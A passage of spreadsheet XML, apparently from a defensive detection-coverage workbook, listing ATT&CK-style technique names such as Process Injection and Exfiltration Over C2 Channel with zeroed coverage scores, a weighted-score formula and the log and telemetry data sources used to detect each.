      <c r="G26" s="14">
        <v>0</v>
      </c>
      <c r="H26" s="14">
        <v>0</v>
      </c>
      <c r="I26" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K26" s="46" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="27" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A27" s="43" t="s">
        <v>86</v>
      </c>
      <c r="B27" s="41" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:B)</f>
        <v>Multiband Communication</v>
      </c>
      <c r="C27" s="45"/>
      <c r="D27" s="45"/>
      <c r="E27" s="45"/>
      <c r="F27" s="14">
        <v>0</v>
      </c>
      <c r="G27" s="14">
        <v>0</v>
      </c>
      <c r="H27" s="14">
        <v>0</v>
      </c>
      <c r="I27" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K27" s="46" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="28" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A28" s="43" t="s">
        <v>87</v>
      </c>
      <c r="B28" s="41" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:B)</f>
        <v>Obfuscated Files or Information</v>
      </c>
      <c r="C28" s="45"/>
      <c r="D28" s="45"/>
      <c r="E28" s="45"/>
      <c r="F28" s="14">
        <v>0</v>
      </c>
      <c r="G28" s="14">
        <v>0</v>
      </c>
      <c r="H28" s="14">
        <v>0</v>
      </c>
      <c r="I28" s="32">
        <f>((F28*2)+G28+(H28*2))/5</f>
        <v>0</v>
      </c>
      <c r="K28" s="46" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="29" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A29" s="43" t="s">
        <v>89</v>
      </c>
      <c r="B29" s="41" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal from Tools</v>
      </c>
      <c r="C29" s="45"/>
      <c r="D29" s="45"/>
      <c r="E29" s="45"/>
      <c r="F29" s="14">
        <v>0</v>
      </c>
      <c r="G29" s="14">
        <v>0</v>
      </c>
      <c r="H29" s="14">
        <v>0</v>
      </c>
      <c r="I29" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K29" s="46" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
      </c>
    </row>
    <row r="30" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A30" s="43" t="s">
        <v>91</v>
      </c>
      <c r="B30" s="41" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:B)</f>
        <v>Scheduled Transfer</v>
      </c>
      <c r="C30" s="45"/>
      <c r="D30" s="45"/>
      <c r="E30" s="45"/>
      <c r="F30" s="14">
        <v>0</v>
      </c>
      <c r="G30" s="14">
        <v>0</v>
      </c>
      <c r="H30" s="14">
        <v>0</v>
      </c>
      <c r="I30" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K30" s="46" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="31" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A31" s="43" t="s">
        <v>92</v>
      </c>
      <c r="B31" s="41" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C31" s="45"/>
      <c r="D31" s="45"/>
      <c r="E31" s="45"/>
      <c r="F31" s="14">
        <v>0</v>
      </c>
      <c r="G31" s="14">
        <v>0</v>
      </c>
      <c r="H31" s="14">
        <v>0</v>
      </c>
      <c r="I31" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K31" s="46" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="32" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A32" s="43" t="s">
        <v>94</v>
      </c>
      <c r="B32" s="41" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C32" s="45"/>
      <c r="D32" s="45"/>
      <c r="E32" s="45"/>
      <c r="F32" s="14">
        <v>0</v>
      </c>
      <c r="G32" s="14">
        <v>0</v>
      </c>
      <c r="H32" s="14">
        <v>0</v>
      </c>
      <c r="I32" s="32">
        <f>((F32*2)+G32+(H32*2))/5</f>
        <v>0</v>
      </c>
      <c r="K32" s="46" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="33" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A33" s="43" t="s">
        <v>96</v>
      </c>
      <c r="B33" s="41" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C33" s="45"/>
      <c r="D33" s="45"/>
      <c r="E33" s="45"/>
      <c r="F33" s="14">
        <v>0</v>
      </c>
      <c r="G33" s="14">
        <v>0</v>
      </c>
      <c r="H33" s="14">
        <v>0</v>
      </c>
      <c r="I33" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K33" s="46" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="34" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A34" s="43" t="s">
        <v>98</v>
      </c>
      <c r="B34" s="41" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:B)</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="C34" s="45"/>
      <c r="D34" s="45"/>
      <c r="E34" s="45"/>
      <c r="F34" s="14">
        <v>0</v>
      </c>
      <c r="G34" s="14">
        <v>0</v>
      </c>
      <c r="H34" s="14">
        <v>0</v>
      </c>
      <c r="I34" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K34" s="46" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="35" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A35" s="43" t="s">
        <v>100</v>
      </c>
      <c r="B35" s="41" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:B)</f>
        <v>Path Interception</v>
      </c>
      <c r="C35" s="45"/>
      <c r="D35" s="45"/>
      <c r="E35" s="45"/>
      <c r="F35" s="14">
        <v>0</v>
      </c>
      <c r="G35" s="14">
        <v>0</v>
      </c>
      <c r="H35" s="14">
        <v>0</v>
      </c>
      <c r="I35" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K35" s="46" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="36" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A36" s="43" t="s">
        <v>101</v>
      </c>
      <c r="B36" s="41" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:B)</f>
        <v>Path Interception</v>
      </c>
      <c r="C36" s="45"/>
      <c r="D36" s="45"/>
      <c r="E36" s="45"/>
      <c r="F36" s="14">
        <v>0</v>
      </c>
      <c r="G36" s="14">
        <v>0</v>
      </c>
      <c r="H36" s="14">
        <v>0</v>
      </c>
      <c r="I36" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K36" s="46" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="37" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A37" s="43" t="s">
        <v>102</v>
      </c>
      <c r="B37" s="41" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:B)</f>
        <v>Masquerading</v>
      </c>
      <c r="C37" s="45"/>
      <c r="D37" s="45"/>
      <c r="E37" s="45"/>
      <c r="F37" s="14">
        <v>0</v>
      </c>
      <c r="G37" s="14">
        <v>0</v>
      </c>
      <c r="H37" s="14">
        <v>0</v>
      </c>
      <c r="I37" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K37" s="46" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Process monitoring,Binary file metadata</v>
      </c>
    </row>
    <row r="38" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A38" s="43" t="s">
        <v>103</v>
      </c>
      <c r="B38" s="41" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:B)</f>
        <v>Boot or Logon Initialization Scripts</v>
      </c>
      <c r="C38" s="45"/>
      <c r="D38" s="45"/>
      <c r="E38" s="45"/>
      <c r="F38" s="14">
        <v>0</v>
      </c>
      <c r="G38" s="14">
        <v>0</v>
      </c>
      <c r="H38" s="14">
        <v>0</v>
      </c>
      <c r="I38" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K38" s="46" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="39" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A39" s="43" t="s">
        <v>105</v>
      </c>
      <c r="B39" s="41" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:B)</f>
        <v>Startup Items</v>
      </c>
      <c r="C39" s="45"/>
      <c r="D39" s="45"/>
      <c r="E39" s="45"/>
      <c r="F39" s="14">
        <v>0</v>
      </c>
      <c r="G39" s="14">
        <v>0</v>
      </c>
      <c r="H39" s="14">
        <v>0</v>
      </c>
      <c r="I39" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K39" s="46" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="40" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A40" s="43" t="s">
        <v>106</v>
      </c>
      <c r="B40" s="41" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:B)</f>
        <v>Data from Network Shared Drive</v>
      </c>
      <c r="C40" s="45"/>
      <c r="D40" s="45"/>
      <c r="E40" s="45"/>
      <c r="F40" s="14">
        <v>0</v>
      </c>
      <c r="G40" s="14">
        <v>0</v>
      </c>
      <c r="H40" s="14">
        <v>0</v>
      </c>
      <c r="I40" s="32">
        <f>((F40*2)+G40+(H40*2))/5</f>
        <v>0</v>
      </c>
      <c r="K40" s="46" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="41" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A41" s="43" t="s">
        <v>108</v>
      </c>
      <c r="B41" s="41" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:B)</f>
        <v>Network Sniffing</v>
      </c>
      <c r="C41" s="45"/>
      <c r="D41" s="45"/>
      <c r="E41" s="45"/>
      <c r="F41" s="14">
        <v>0</v>
      </c>
      <c r="G41" s="14">
        <v>0</v>
      </c>
      <c r="H41" s="14">
        <v>0</v>
      </c>
      <c r="I41" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K41" s="46" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
      </c>
    </row>
    <row r="42" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A42" s="43" t="s">
        <v>110</v>
      </c>
      <c r="B42" s="41" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="C42" s="45"/>
      <c r="D42" s="45"/>
      <c r="E42" s="45"/>
      <c r="F42" s="14">
        <v>0</v>
      </c>
      <c r="G42" s="14">
        <v>0</v>
      </c>
      <c r="H42" s="14">
        <v>0</v>
      </c>
      <c r="I42" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K42" s="46" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
    </row>
    <row r="43" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A43" s="43" t="s">
        <v>112</v>
      </c>
      <c r="B43" s="41" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="C43" s="45"/>
      <c r="D43" s="45"/>
      <c r="E43" s="45"/>
      <c r="F43" s="14">
        <v>0</v>
      </c>
      <c r="G43" s="14">
        <v>0</v>
      </c>
      <c r="H43" s="14">
        <v>0</v>
      </c>
      <c r="I43" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K43" s="46" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
    </row>
    <row r="44" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A44" s="43" t="s">
        <v>113</v>
      </c>
      <c r="B44" s="41" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C44" s="45"/>
      <c r="D44" s="45"/>
      <c r="E44" s="45"/>
      <c r="F44" s="14">
        <v>0</v>
      </c>
      <c r="G44" s="14">
        <v>0</v>
      </c>
      <c r="H44" s="14">
        <v>0</v>
      </c>
      <c r="I44" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K44" s="46" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="45" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A45" s="43" t="s">
        <v>115</v>
      </c>
      <c r="B45" s="41" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C45" s="45"/>
      <c r="D45" s="45"/>
      <c r="E45" s="45"/>
      <c r="F45" s="14">
        <v>0</v>
      </c>
      <c r="G45" s="14">
        <v>0</v>
      </c>
      <c r="H45" s="14">
        <v>0</v>
      </c>
      <c r="I45" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K45" s="46" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="46" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A46" s="43" t="s">
        <v>116</v>
      </c>
      <c r="B46" s="41" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C46" s="45"/>
      <c r="D46" s="45"/>
      <c r="E46" s="45"/>
      <c r="F46" s="14">
        <v>0</v>
      </c>
      <c r="G46" s="14">
        <v>0</v>
      </c>
      <c r="H46" s="14">
        <v>0</v>
      </c>
      <c r="I46" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K46" s="46" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="47" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A47" s="43" t="s">
        <v>117</v>
      </c>
      <c r="B47" s="41" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:B)</f>
        <v>Network Service Scanning</v>
      </c>
      <c r="C47" s="45"/>
      <c r="D47" s="45"/>
      <c r="E47" s="45"/>
      <c r="F47" s="14">
        <v>0</v>
      </c>
      <c r="G47" s="14">
        <v>0</v>
      </c>
      <c r="H47" s="14">
        <v>0</v>
      </c>
      <c r="I47" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K47" s="46" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
      </c>
    </row>
    <row r="48" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A48" s="43" t="s">
        <v>118</v>
      </c>
      <c r="B48" s="41" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:B)</f>
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="C48" s="45"/>
      <c r="D48" s="45"/>
      <c r="E48" s="45"/>
      <c r="F48" s="14">
        <v>0</v>
      </c>
      <c r="G48" s="14">
        <v>0</v>
      </c>
      <c r="H48" s="14">
        <v>0</v>
      </c>
      <c r="I48" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K48" s="46" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="49" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A49" s="43" t="s">
        <v>119</v>
      </c>
      <c r="B49" s="41" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="C49" s="45"/>
      <c r="D49" s="45"/>
      <c r="E49" s="45"/>
      <c r="F49" s="14">
        <v>0</v>
      </c>
      <c r="G49" s="14">
        <v>0</v>
      </c>
      <c r="H49" s="14">
        <v>0</v>
      </c>
      <c r="I49" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K49" s="46" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
      </c>
    </row>
    <row r="50" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A50" s="43" t="s">
        <v>121</v>
      </c>
      <c r="B50" s="41" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:B)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="C50" s="45"/>
      <c r="D50" s="45"/>
      <c r="E50" s="45"/>
      <c r="F50" s="14">
        <v>0</v>
      </c>
      <c r="G50" s="14">
        <v>0</v>
      </c>
      <c r="H50" s="14">
        <v>0</v>
      </c>
      <c r="I50" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K50" s="46" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="51" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A51" s="43" t="s">
        <v>123</v>
      </c>
      <c r="B51" s="41" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:B)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="C51" s="45"/>
      <c r="D51" s="45"/>
      <c r="E51" s="45"/>
      <c r="F51" s="14">
        <v>0</v>
      </c>
      <c r="G51" s="14">
        <v>0</v>
      </c>
      <c r="H51" s="14">
        <v>0</v>
      </c>
      <c r="I51" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K51" s="46" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="52" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A52" s="43" t="s">
        <v>124</v>
      </c>
      <c r="B52" s="41" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:B)</f>
        <v>Shared Webroot</v>
      </c>
      <c r="C52" s="45"/>
      <c r="D52" s="45"/>
      <c r="E52" s="45"/>
      <c r="F52" s="14">
        <v>0</v>
      </c>
      <c r="G52" s="14">
        <v>0</v>
      </c>
      <c r="H52" s="14">
        <v>0</v>
      </c>
      <c r="I52" s="32">
        <f>((F52*2)+G52+(H52*2))/5</f>
        <v>0</v>
      </c>
      <c r="K52" s="46" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="53" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A53" s="43" t="s">
        <v>125</v>
      </c>
      <c r="B53" s="41" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Physical Medium</v>
      </c>
      <c r="C53" s="45"/>
      <c r="D53" s="45"/>
      <c r="E53" s="45"/>
      <c r="F53" s="14">
        <v>0</v>
      </c>
      <c r="G53" s="14">
        <v>0</v>
      </c>
      <c r="H53" s="14">
        <v>0</v>
      </c>
      <c r="I53" s="32">
        <f>((F53*2)+G53+(H53*2))/5</f>
        <v>0</v>
      </c>
      <c r="K53" s="46" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Data loss prevention,File monitoring</v>
      </c>
    </row>
    <row r="54" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A54" s="43" t="s">
        <v>127</v>
      </c>
      <c r="B54" s="41" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:B)</f>
        <v>Scheduled Task/Job</v>
      </c>
      <c r="C54" s="45"/>
      <c r="D54" s="45"/>
      <c r="E54" s="45"/>
      <c r="F54" s="14">
        <v>0</v>
      </c>
      <c r="G54" s="14">
        <v>0</v>
      </c>
      <c r="H54" s="14">
        <v>0</v>
      </c>
      <c r="I54" s="32">
        <f>((F54*2)+G54+(H54*2))/5</f>
        <v>0</v>
      </c>
      <c r="K54" s="46" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
    </row>
    <row r="55" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A55" s="43" t="s">
        <v>129</v>
      </c>
      <c r="B55" s="41" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:B)</f>
        <v>Systemd Timers</v>
      </c>
      <c r="C55" s="45"/>
      <c r="D55" s="45"/>
      <c r="E55" s="45"/>
      <c r="F55" s="14">
        <v>0</v>
      </c>
      <c r="G55" s="14">
        <v>0</v>
      </c>
      <c r="H55" s="14">
        <v>0</v>
      </c>
      <c r="I55" s="32">
        <f t="shared" ref="I55:I83" si="2">((F55*2)+G55+(H55*2))/5</f>
        <v>0</v>
      </c>
      <c r="K55" s="46" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="56" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A56" s="43" t="s">
        <v>131</v>
      </c>
      <c r="B56" s="41" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:B)</f>
        <v>Process Injection</v>
      </c>
      <c r="C56" s="45"/>
      <c r="D56" s="45"/>
      <c r="E56" s="45"/>
      <c r="F56" s="14">
        <v>0</v>
      </c>
      <c r="G56" s="14">
        <v>0</v>
      </c>
      <c r="H56" s="14">
        <v>0</v>
      </c>
      <c r="I56" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K56" s="46" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
      </c>
    </row>
    <row r="57" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A57" s="43" t="s">
        <v>133</v>
      </c>
      <c r="B57" s="41" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:B)</f>
        <v>Input Capture</v>
      </c>
      <c r="C57" s="45"/>
      <c r="D57" s="45"/>
      <c r="E57" s="45"/>
      <c r="F57" s="14">
        <v>0</v>
      </c>
      <c r="G57" s="14">
        <v>0</v>
      </c>
      <c r="H57" s="14">
        <v>0</v>
      </c>
      <c r="I57" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K57" s="46" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,User interface,Process command-line parameters,Process monitoring,PowerShell logs,Loaded DLLs,Kernel drivers,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
    </row>
    <row r="58" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A58" s="43" t="s">
        <v>135</v>
      </c>
      <c r="B58" s="41" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:B)</f>
        <v>Process Discovery</v>
      </c>
      <c r="C58" s="45"/>
      <c r="D58" s="45"/>
      <c r="E58" s="45"/>
      <c r="F58" s="14">
        <v>0</v>
      </c>
      <c r="G58" s="14">
        <v>0</v>
      </c>
      <c r="H58" s="14">
        <v>0</v>
      </c>
      <c r="I58" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K58" s="46" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="59" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A59" s="43" t="s">
        <v>136</v>
      </c>
      <c r="B59" s="41" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:B)</f>
        <v>Process Discovery</v>
      </c>
      <c r="C59" s="45"/>
      <c r="D59" s="45"/>
      <c r="E59" s="45"/>
      <c r="F59" s="14">
        <v>0</v>
      </c>
      <c r="G59" s="14">
        <v>0</v>
      </c>
      <c r="H59" s="14">
        <v>0</v>
      </c>
      <c r="I59" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K59" s="46" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="60" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A60" s="43" t="s">
        <v>138</v>
      </c>
      <c r="B60" s="41" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:B)</f>
        <v>Command and Scripting Interpreter</v>
      </c>
      <c r="C60" s="45"/>
      <c r="D60" s="45"/>
      <c r="E60" s="45"/>
      <c r="F60" s="14">
        <v>0</v>
      </c>
      <c r="G60" s="14">
        <v>0</v>
      </c>
      <c r="H60" s="14">
        <v>0</v>
      </c>
      <c r="I60" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K60" s="46" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,PowerShell logs,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="61" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A61" s="43" t="s">
        <v>139</v>
      </c>
      <c r="B61" s="41" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:B)</f>
        <v>Network Device CLI</v>
      </c>
      <c r="C61" s="45"/>
      <c r="D61" s="45"/>
      <c r="E61" s="45"/>
      <c r="F61" s="14">
        <v>0</v>
      </c>
      <c r="G61" s="14">
        <v>0</v>
      </c>
      <c r="H61" s="14">
        <v>0</v>
      </c>
      <c r="I61" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K61" s="46" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network device run-time memory,Network device command history,Network device configuration</v>
      </c>
    </row>
    <row r="62" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A62" s="43" t="s">
        <v>141</v>
      </c>
      <c r="B62" s="41" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:B)</f>
        <v>Graphical User Interface</v>
      </c>
      <c r="C62" s="45"/>
      <c r="D62" s="45"/>
      <c r="E62" s="45"/>
      <c r="F62" s="14">
        <v>0</v>
      </c>
      <c r="G62" s="14">
        <v>0</v>
      </c>
      <c r="H62" s="14">
        <v>0</v>
      </c>
      <c r="I62" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K62" s="46" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
    </row>
    <row r="63" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A63" s="43" t="s">
        <v>142</v>
      </c>
      <c r="B63" s="41" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:B)</f>
        <v>Hypervisor</v>
      </c>
      <c r="C63" s="45"/>
      <c r="D63" s="45"/>
      <c r="E63" s="45"/>
      <c r="F63" s="14">
        <v>0</v>
      </c>
      <c r="G63" s="14">
        <v>0</v>
      </c>
      <c r="H63" s="14">
        <v>0</v>
      </c>
      <c r="I63" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K63" s="46" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
    </row>
    <row r="64" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A64" s="43" t="s">
        <v>143</v>
      </c>
      <c r="B64" s="41" t="str">
